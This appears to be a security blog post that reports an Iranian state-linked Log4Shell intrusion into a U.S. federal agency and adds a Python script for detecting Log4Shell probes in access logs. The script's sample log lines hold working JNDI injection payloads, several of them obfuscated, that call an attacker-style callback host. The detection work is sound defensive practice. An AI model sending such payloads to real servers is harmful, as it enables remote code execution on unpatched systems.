Iranian Hackers Compromised a U.S. Federal Agency’s Network Using Log4Shell Exploit

siteadmin November 17, 2022

Iranian state-sponsored threat actors compromised the network of a U.S. federal civilian executive branch agency by exploiting the Log4Shell vulnerability (CVE-2021-44228) in an unpatched VMware Horizon server. Once inside, the intruders installed XMRig cryptocurrency-mining software, moved laterally to the domain controller, harvested credentials, and deployed Ngrok reverse proxies on several hosts to maintain access. The intrusion shows that Iranian state-linked groups continue to exploit Log4j; earlier advisories attributed similar activity to Iran's Islamic Revolutionary Guard Corps (IRGC). The agency is believed to have been compromised since at least February 2022; to evade detection, the actors added an exclusion to the server's Windows Defender antivirus so that the directory holding their tooling would not be scanned.
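The check a defender wants after reading this is whether their own Horizon (or any other Log4j-backed) front end has already seen Log4Shell probes. The following is an added example written for this page, not code from CISA, VMware, or the original article: it normalizes the common JNDI-lookup obfuscations (URL encoding, `${lower:...}`/`${upper:...}`, and `${...:-x}` default-value tricks) before matching, and reports the callback scheme and host. The log lines are constructed for the demonstration; the format and helper names are assumptions, not anything taken from the advisory.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic from the incident).
# Lines 2-5 carry progressively more obfuscated Log4Shell payloads in the
# User-Agent or query string; line 1 is benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Feb/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2022:03:14:09 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [12/Feb/2022:03:15:01 +0000] '
    '"GET /portal/?x=${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b} HTTP/1.1" 404 12 "-" "curl/7.68"',
    '10.0.0.9 - - [12/Feb/2022:03:15:30 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c}"',
    '10.0.0.3 - - [12/Feb/2022:03:16:00 +0000] '
    '"GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

# ${anything:-value} resolves to "value" in Log4j's lookup syntax, so ${::-j} == "j".
DEFAULT_VALUE_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*?)\}")
# ${lower:X} / ${upper:X} case-fold X; attackers use them to split the "jndi" token.
CASE_LOOKUP_RE = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# After normalization, a JNDI lookup is ${jndi:<scheme>:<host>...}.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/*([^/\s}]+)", re.IGNORECASE)


def _fold_case(m: "re.Match[str]") -> str:
    """Apply the lower/upper lookup the way Log4j would."""
    value = m.group(2)
    return value.lower() if m.group(1).lower() == "lower" else value.upper()


def normalize_payload(text: str, max_rounds: int = 10) -> str:
    """Iteratively strip URL encoding and resolve innermost lookups until stable.

    Each round resolves only lookups with no nested braces, so nested payloads
    such as ${${lower:j}ndi:...} collapse from the inside out.
    """
    for _ in range(max_rounds):
        before = text
        text = unquote(text)                       # one layer of %-encoding
        text = DEFAULT_VALUE_RE.sub(r"\1", text)   # ${...:-x} -> x
        text = CASE_LOOKUP_RE.sub(_fold_case, text)
        if text == before:
            break
    return text


def scan_log_lines(lines):
    """Return one finding per line that contains a JNDI lookup after normalization."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        normalized = normalize_payload(raw)
        match = JNDI_RE.search(normalized)
        if match:
            findings.append({
                "line_no": line_no,
                "scheme": match.group(1).lower(),   # ldap, rmi, dns, ...
                "callback": match.group(2),         # attacker-controlled host[:port]
                "normalized": normalized,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line_no']}: {finding['scheme']} -> {finding['callback']}")
```

Run it over Horizon/Tomcat access logs or any HTTP logs in front of a Log4j-based service; the callback hosts it extracts are the indicators to block and hunt for in DNS and firewall logs. This is triage, not a complete filter: there are further lookup types (`${env:...}`, `${sys:...}`, `${date:...}`) that the normalizer does not resolve, and a payload delivered in a header the server does not log will not appear at all. Patching Log4j and Horizon remains the actual fix.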